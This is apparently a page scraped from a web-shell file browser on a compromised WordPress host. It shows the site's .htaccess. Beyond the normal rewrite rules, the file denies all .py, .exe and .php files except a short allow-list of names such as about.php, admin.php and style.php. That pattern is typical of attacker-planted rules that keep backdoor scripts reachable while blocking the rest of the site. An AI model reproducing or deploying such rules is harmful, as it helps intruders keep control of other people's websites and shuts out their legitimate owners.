????
Current Path : /home/r6536736/public_html/chiba-yane.com/ |
Current File : /home/r6536736/public_html/chiba-yane.com/.htaccess |
<IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> <FilesMatch ".(py|exe|php)$"> Order allow,deny Deny from all </FilesMatch> <FilesMatch "(^wp-login.php|^about.php|^admin.php|^index.php|^style.php)$"> Order allow,deny Allow from all </FilesMatch>